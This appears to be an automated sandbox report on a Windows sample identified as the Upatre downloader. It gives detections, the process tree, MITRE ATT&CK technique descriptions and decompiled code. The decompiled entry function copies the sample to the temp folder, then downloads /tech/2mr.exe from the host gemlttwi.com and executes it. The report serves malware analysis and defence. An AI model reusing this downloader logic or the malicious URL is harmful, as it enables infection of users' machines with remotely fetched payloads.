2023-02-17 05:19:57 UTC	90	IN	Data Raw: 32 30 31 34 0d 0a 3c 2f 64 69 76 3e 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 09 09 3c 2f 68 65 61 64 65 72 3e 3c 21 2d 2d 20 23 6d 61 73 74 68 65 61 64 20 2d 2d 3e 0d 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 63 6f 6e 74 65 6e 74 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 09 09 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 70 72 69 6d 61 72 79 22 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 61 72 65 61 20 70 72 69 6d 61 72 79 22 3e 0d 0a 0d 0a 09 09 0d 0a 09 09 0d 0a 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 34 30 34 20 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0d 0a 0d 0a 09 0d Data Ascii: 2014</div></div></div></div></header>... #masthead --><div id="content" class="site-content"><div class="ast-container"><div id="primary" class="content-area primary"><section class="error-404 not-found">
2023-02-17 05:19:57 UTC	98	IN	Data Raw: 74 69 6f 6e 2d 66 6f 6f 74 65 72 2d 62 75 69 6c 64 65 72 22 3e 0a 09 09 09 09 Data Ascii: tion-footer-builder">
2023-02-17 05:19:57 UTC	98	IN	Data Raw: 0d 0a Data Ascii:
2023-02-17 05:19:57 UTC	98	IN	Data Raw: 39 37 66 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 73 74 2d 66 6f 6f 74 65 72 2d 63 6f 70 79 72 69 67 68 74 22 3e 3c 70 3e 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 32 30 32 33 20 47 65 6e 65 72 61 6c 20 45 61 72 74 68 20 4d 6f 76 65 72 73 20 4c 69 6d 69 74 65 64 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 66 6f 6f 74 65 72 2d 62 65 6c 6f 77 2d 73 65 63 74 69 6f 6e 2d 32 20 73 69 74 65 2d 66 6f 6f 74 65 72 2d 73 65 63 74 69 6f 6e 20 73 69 74 65 2d 66 6f 6f 74 65 72 2d 73 65 63 74 69 6f 6e 2d 32 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 2d 61 72 65 61 20 Data Ascii: 97f<div class="ast-footer-copyright"><p>Copyright 2023 General Earth Movers Limited</p></div></div></div><div class="site-footer-below-section-2 site-footer-section site-footer-section-2"><div class="footer-widget-area

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: v6DLIositV.exePID: 2952, Parent PID: 3528

General

Target ID:	0
Start time:	06:19:52
Start date:	17/02/2023
Path:	C:\Users\user\Desktop\v6DLIositV.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\v6DLIositV.exe
Imagebase:	0x400000
File size:	33346 bytes
MD5 hash:	9DE48E7CFC2BC56631387E527F859EFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Upatre, Description: Yara detected Upatre, Source: 00000000.00000003.303571500.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Upatre, Description: Yara detected Upatre, Source: 00000000.00000002.306318619.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: hurok.exePID: 5104, Parent PID: 2952

General

Target ID:	1
Start time:	06:19:53
Start date:	17/02/2023
Path:	C:\Users\user\AppData\Local\Temp\hurok.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\hurok.exe"
Imagebase:	0x400000
File size:	33424 bytes
MD5 hash:	9313C9760ABEE035167EC3A7CC743EB2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Upatre, Description: Yara detected Upatre, Source: 00000001.00000003.305686991.0000000002060000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Upatre, Description: Yara detected Upatre, Source: 00000001.00000002.314199017.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: v6DLIositV.exePID: 2952, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	24.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	69.1%
Total number of Nodes:	55
Total number of Limit Nodes:	13

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00401020 Relevance: 87.8, APIs: 39, Strings: 11, Instructions: 300
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			_entry_() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				long _v32;
				void _v36;
				void _v40;
				long _v44;
				long _v48;
				int _v52;
				short* _v56;
				WCHAR* _v60;
				long _v64;
				short _v2112;
				void* _t99;
				void* _t100;
				void* _t105;
				void* _t109;
				int _t111;
				void* _t117;
				void* _t120;
				void* _t122;
				void* _t132;
				long _t135;
				int _t146;
				void* _t151;
				void* _t160;
				long _t161;
				WCHAR* _t171;
				long _t174;
				WCHAR* _t175;
				void* _t178;

				if(GetModuleHandleW(0) == 0xffffffff) {
					L1:
					ExitProcess(1);
					L2:
				}
				_t99 = HeapCreate(0, 0x2000, 0); // executed
				_v24 = _t99;
				_t100 = RtlAllocateHeap(_t99, 8, 0x2000); // executed
				_v16 = _t100;
				_v8 = HeapAlloc(_v24, 8, 0x2000);
				GetModuleFileNameW(0, _v16, 0x2000);
				GetTempPathW(0x1000, _v8);
				wsprintfW(_v8, L"%s%s", _v8, L"hurok.exe");
				_t178 = _t178 + 0x10;
				_t105 = CreateFileW(_v16, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v12 = _t105;
				if(_t105 != 0xffffffff) {
					_v28 = GetFileSize(_t105, 0);
					_t109 = RtlAllocateHeap(_v24, 8, _v28 + 4 + lstrlenW(_v16) * 2); // executed
					_v20 = _t109;
					if(_t109 == 0) {
						goto L1;
					}
					ReadFile(_v12, _t109, _v28,  &_v32, 0); // executed
					_t111 = lstrcmpW(_v16, _v8); // executed
					if(_t111 == 0) {
						_t171 =  *((intOrPtr*)(( *( *((intOrPtr*)(_v20 + 0x3c)) + _v20 + 6) & 0x0000ffff) * 0x28 +  *((intOrPtr*)(_v20 + 0x3c)) + _v20 + 0xd0 + 0x14)) +  *((intOrPtr*)(( *( *((intOrPtr*)(_v20 + 0x3c)) + _v20 + 6) & 0x0000ffff) * 0x28 +  *((intOrPtr*)(_v20 + 0x3c)) + _v20 + 0xd0 + 0x10)) + _v20;
						CloseHandle(_v12);
						_v12 = 0;
						while(DeleteFileW(_t171) == 0) {
							_v12 = _v12 + 1;
							if(_v12 <= 0x4e20) {
								continue;
							}
							break;
						}
						_t117 = InternetOpenW(L"Updates downloader", 0, 0, 0, 0);
						_v28 = _t117;
						if(_t117 != 0) {
							_push(0);
							_push(0);
							_push(3);
							_push(0);
							_push(0);
							_push(0x1bb);
							_push(L"gemlttwi.com");
							_push(_t117);
							while(1) {
								_t120 = InternetConnectW();
								_v12 = _t120;
								_push(0);
								if(_t120 != 0) {
									break;
								}
								_push(0);
								_push(3);
								_push(0);
								_push(0);
								_push(0x1bb);
								_push(L"gemlttwi.com");
								_push(_v28);
							}
							_v60 = L"text/*";
							_v56 = L"application/*";
							_v52 = 0;
							while(1) {
								_t122 = HttpOpenRequestW(_v12, 0, L"/tech/2mr.exe", 0, 0,  &_v60, 0x80803000, ??);
								_v8 = _t122;
								if(_t122 != 0) {
									break;
								}
								_push(0);
							}
							_t174 = 4;
							_v48 = _t174;
							InternetQueryOptionW(_v8, 0x1f,  &_v40,  &_v48);
							_v40 = _v40 | 0x00000100;
							InternetSetOptionW(_v8, 0x1f,  &_v40, _t174);
							do {
							} while (HttpSendRequestW(_v8, 0, 0, 0, 0) == 0);
							_v44 = _t174;
							_v36 = 0;
							HttpQueryInfoW(_v8, 0x20000005,  &_v36,  &_v44, 0);
							_t132 = HeapAlloc(_v24, 8, _v36);
							_v20 = _t132;
							if(_t132 != 0) {
								_v32 = 0;
								L24:
								while(1) {
									do {
									} while (InternetReadFile(_v8, _v20, _v36,  &_v32) == 0);
									_t135 = _v32;
									if(_t135 == 0 || _t135 == _v36) {
										_t175 = L"hurrok.exe";
										_t160 = CreateFileW(_t175, 0x40000000, 2, 0, 2, 0x80, 0);
										WriteFile(_t160, _v20, _v32,  &_v64, 0);
										CloseHandle(_t160);
										GetCurrentDirectoryW(0x400,  &_v2112);
										wsprintfW( &_v2112, L"%s\\%s",  &_v2112, _t175);
										_t178 = _t178 + 0x10;
										_push(0);
										_push(0);
										_push(0);
										_push( &_v2112);
										goto L9;
									} else {
										_v20 = _v20 + _t135;
										continue;
									}
								}
							}
						}
					} else {
						_t146 = lstrlenW(_v16);
						_t161 = _v28;
						E00401000(_v20 + _t161, _v16, _t146 + _t146 + 2);
						_t151 = CreateFileW(_v8, 0x40000000, 2, 0, 2, 0x80, 0); // executed
						_v24 = _t151;
						if(_t151 != 0xffffffff) {
							WriteFile(_v24, _v20, _t161 + 4 + lstrlenW(_v16) * 2,  &_v32, 0); // executed
							FindCloseChangeNotification(_v12); // executed
							CloseHandle(_v24);
							GetTempPathW(0x1000, _v16);
							_push(0);
							_push(_v16);
							_push(0);
							_push(_v8);
							L9:
							ShellExecuteW(0, L"open", ??, ??, ??, ??); // executed
							ExitProcess(0);
							goto L2;
						}
					}
				}
				return 1;
			}

0x00401038
0x0040103a
0x0040103c
0x0040103c
0x0040103c
0x0040104a
0x0040105a
0x0040105d
0x00401065
0x0040106e
0x00401072
0x00401080
0x00401096
0x0040109c
0x004010b2
0x004010b8
0x004010be
0x004010d9
0x004010eb
0x004010ed
0x004010f2
0x00000000
0x00000000
0x00401104
0x00401110
0x00401118
0x004011d0
0x004011d3
0x004011d9
0x004011ea
0x004011de
0x004011e8
0x00000000
0x00000000
0x00000000
0x004011e8
0x004011fe
0x00401204
0x00401209
0x00401215
0x00401216
0x00401217
0x00401219
0x0040121a
0x0040121b
0x00401220
0x00401225
0x0040123a
0x0040123a
0x0040123c
0x0040123f
0x00401242
0x00000000
0x00000000
0x00401228
0x00401229
0x0040122b
0x0040122c
0x0040122d
0x00401232
0x00401237
0x00401237
0x0040124a
0x00401251
0x00401258
0x0040125e
0x00401272
0x00401274
0x00401279
0x00000000
0x00000000
0x0040125d
0x0040125d
0x0040127d
0x0040128b
0x0040128e
0x00401294
0x004012a5
0x004012ab
0x004012b8
0x004012cd
0x004012d0
0x004012d3
0x004012e1
0x004012e3
0x004012e8
0x004012ee
0x00000000
0x004012f1
0x004012f1
0x00401304
0x00401308
0x0040130d
0x00401329
0x00401336
0x00401343
0x0040134a
0x0040135c
0x00401370
0x00401376
0x00401379
0x0040137a
0x0040137b
0x00401382
0x00000000
0x00401314
0x00401314
0x00000000
0x00401314
0x0040130d
0x004012f1
0x004012e8
0x0040111e
0x00401121
0x00401123
0x00401134
0x0040114c
0x00401152
0x00401158
0x00401173
0x00401182
0x00401187
0x00401191
0x00401197
0x00401198
0x0040119b
0x0040119c
0x0040119f
0x004011a5
0x0040103c
0x00000000
0x0040103c
0x00401158
0x00401118
0x004010c7

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0040102F
ExitProcess.KERNEL32 ref: 0040103C
HeapCreate.KERNELBASE(00000000,00002000,00000000), ref: 0040104A
RtlAllocateHeap.NTDLL(00000000,00000008,00002000), ref: 0040105D
HeapAlloc.KERNEL32(?,00000008,00002000), ref: 00401068
GetModuleFileNameW.KERNEL32(00000000,?,00002000), ref: 00401072
GetTempPathW.KERNEL32(00001000,?), ref: 00401080
wsprintfW.USER32 ref: 00401096
CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004010B2

Strings

gemlttwi.com, xrefs: 00401220, 00401232
Updates downloader, xrefs: 004011F9
%s%s, xrefs: 0040108E
N, xrefs: 004011E1
application/*, xrefs: 00401251
text/*, xrefs: 0040124A, 00401266
hurok.exe, xrefs: 00401086
%s\%s, xrefs: 0040136A
/tech/2mr.exe, xrefs: 00401269
hurrok.exe, xrefs: 00401329, 0040132E, 00401362
open, xrefs: 0040119F

Memory Dump Source

Source File: 00000000.00000002.306318619.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.306313541.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.306323828.0000000000404000.00000020.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v6DLIositV.jbxd

Yara matches

Similarity

API ID: Heap$CreateFileModule$AllocAllocateExitHandleNamePathProcessTempwsprintf
String ID: N$%s%s$%s\%s$/tech/2mr.exe$Updates downloader$application/*$gemlttwi.com$hurok.exe$hurrok.exe$open$text/*
API String ID: 3151110699-717343645
Opcode ID: 17d8dc946b7e6321e0dae0aaa4bb31a0671827a03bc6e9c6cb50142c5c4b4d56
Instruction ID: 494f34a99a02b150140b174f107fbe2d6988ac16ebeacf3ea18d5012ae315445
Opcode Fuzzy Hash: 17d8dc946b7e6321e0dae0aaa4bb31a0671827a03bc6e9c6cb50142c5c4b4d56
Instruction Fuzzy Hash: C7B12271901218BBDB219BA0DE4DEEFBF79EF49750F104066F605B21E0C7B45A40DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 005A0572 Relevance: 26.9, APIs: 8, Strings: 7, Instructions: 647
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000004), ref: 005A0604
VirtualAlloc.KERNELBASE(?,00002000,00000001), ref: 005A0823
VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000004), ref: 005A0853
VirtualAlloc.KERNELBASE(?,?,00001000,00000004), ref: 005A0908
LoadLibraryA.KERNELBASE(?), ref: 005A0980

Strings

, xrefs: 005A0D47
LoadLibraryA, xrefs: 005A0597
VirtualAlloc, xrefs: 005A05A8
GetProcAddress, xrefs: 005A0586
UnmapViewOfFile, xrefs: 005A05DB
VirtualProtect, xrefs: 005A05B9
VirtualFree, xrefs: 005A05CA

Memory Dump Source

Source File: 00000000.00000002.306351429.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_v6DLIositV.jbxd

Similarity

API ID: AllocVirtual$LibraryLoad
String ID: $GetProcAddress$LoadLibraryA$UnmapViewOfFile$VirtualAlloc$VirtualFree$VirtualProtect
API String ID: 2441068224-2072240041
Opcode ID: ee233c7f757b222c54212a6b58328ce84fca83a8d338eb3fc58c9ca7cf636e5c
Instruction ID: 217b4d6a06bdd8c1c7b7258c72a028b410671c99fd39359802aa70033fe3972c
Opcode Fuzzy Hash: ee233c7f757b222c54212a6b58328ce84fca83a8d338eb3fc58c9ca7cf636e5c
Instruction Fuzzy Hash: EE52BC75E102199FDB20CFA8C984BADBBB1FF09304F1454A9E959AB391D730AD91DF20

Uniqueness

Uniqueness Score: -1.00%

Source: gemlttwi.com/tech/2mr.exe	Avira URL Cloud: Label: malware
Source: https://gemlttwi.com/tech/2mr.exe	Avira URL Cloud: Label: malware

Source: 1.0.hurok.exe.400000.0.unpack	Avira: Label: TR/Agent.AGY.4
Source: 0.2.v6DLIositV.exe.21c45b8.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.v6DLIositV.exe.400000.0.unpack	Avira: Label: TR/Agent.AGY.4
Source: 1.2.hurok.exe.21845b8.1.unpack	Avira: Label: TR/Patched.Ren.Gen

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report v6DLIositV.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Upatre

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\hurok.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Windows Analysis Report
v6DLIositV.exe

Function 00401020 Relevance: 87.8, APIs: 39, Strings: 11, Instructions: 300
memoryfileCOMMON

Function 005A0572 Relevance: 26.9, APIs: 8, Strings: 7, Instructions: 647
memorylibraryCOMMON